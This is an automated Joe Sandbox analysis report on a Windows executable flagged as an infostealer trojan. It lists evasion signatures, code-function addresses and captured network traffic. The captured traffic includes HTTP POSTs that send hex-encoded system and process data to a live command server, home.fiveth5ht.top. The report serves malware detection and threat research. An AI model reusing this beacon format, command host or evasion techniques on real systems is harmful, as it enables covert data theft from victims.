Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5KwhHEdmM4.exe

Overview

General Information

Sample name:5KwhHEdmM4.exe
renamed because original name is a hash value
Original sample name:0c9fc2b51c7c604fd0bd9789f344cb95.exe
Analysis ID:1581405
MD5:0c9fc2b51c7c604fd0bd9789f344cb95
SHA1:c9dcd9ec34f73e7d109605f5b092e7f16be55bd7
SHA256:5215a50e992b411a73a9cb9dee51b39ce8b7505de7995bcba240e6f809b3696b
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 5KwhHEdmM4.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\5KwhHEdmM4.exe" MD5: 0C9FC2B51C7C604FD0BD9789F344CB95)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 5KwhHEdmM4.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 5KwhHEdmM4.exeReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 5KwhHEdmM4.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00DBDCF0
Source: 5KwhHEdmM4.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00DFA5B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00DFB560
Source: 5KwhHEdmM4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D929FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443147Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 30 39 31 35 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E5A8C0 recvfrom,0_2_00E5A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 443147Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 30 39 31 35 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 14:06:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 14:06:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414833228.0000000001BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: 5KwhHEdmM4.exe, 00000000.00000003.1397048941.0000000001BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414923055.0000000001C05000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396477797.0000000001C03000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=000
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5KwhHEdmM4.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 5KwhHEdmM4.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5KwhHEdmM4.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443

System Summary

barindex
PE file contains section with special chars
Source: 5KwhHEdmM4.exeStatic PE information: section name:
Source: 5KwhHEdmM4.exeStatic PE information: section name: .idata
Source: 5KwhHEdmM4.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C633600_3_01C63360
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C633600_3_01C63360
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_3_01C633600_3_01C63360
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA05B00_2_00DA05B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA6FA00_2_00DA6FA0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E5B1800_2_00E5B180
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DCF1000_2_00DCF100
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E600E00_2_00E600E0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0111A0000_2_0111A000
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0111E0500_2_0111E050
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DF62100_2_00DF6210
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E5C3200_2_00E5C320
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E604200_2_00E60420
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010E44100_2_010E4410
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010F67300_2_010F6730
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_011147800_2_01114780
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9E6200_2_00D9E620
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DFA7F00_2_00DFA7F0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E5C7700_2_00E5C770
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA49400_2_00DA4940
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9A9600_2_00D9A960
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E4C9000_2_00E4C900
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0104AB2C0_2_0104AB2C
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00F66AC00_2_00F66AC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01108BF00_2_01108BF0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9CBB00_2_00D9CBB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00F24B600_2_00F24B60
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0104AAC00_2_0104AAC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01114D400_2_01114D40
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0110CD800_2_0110CD80
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_0111CC900_2_0111CC90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010E2F900_2_010E2F90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010AAE300_2_010AAE30
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E5EF900_2_00E5EF90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E58F900_2_00E58F90
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DB4F700_2_00DB4F70
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA10E60_2_00DA10E6
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_011035B00_2_011035B0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010FD4300_2_010FD430
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_011217A00_2_011217A0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010E56D00_2_010E56D0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010E99200_2_010E9920
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00E498800_2_00E49880
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01101BD00_2_01101BD0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DD1BE00_2_00DD1BE0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01113A700_2_01113A70
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA5DB00_2_00DA5DB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_01049C800_2_01049C80
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_010F7CC00_2_010F7CC0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DA3ED00_2_00DA3ED0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00DB5EB00_2_00DB5EB0
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00D9C960 appears 37 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DD50A0 appears 101 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DD4F40 appears 347 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00D9CAA0 appears 64 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DD5340 appears 50 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00E744A0 appears 76 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00D971E0 appears 47 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00F6CBC0 appears 104 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DD4FD0 appears 291 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DACD40 appears 75 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00D975A0 appears 706 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00F47220 appears 97 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00D973F0 appears 114 times
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: String function: 00DACCD0 appears 55 times
Source: 5KwhHEdmM4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5KwhHEdmM4.exeStatic PE information: Section: dmqztadf ZLIB complexity 0.994349809751973
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
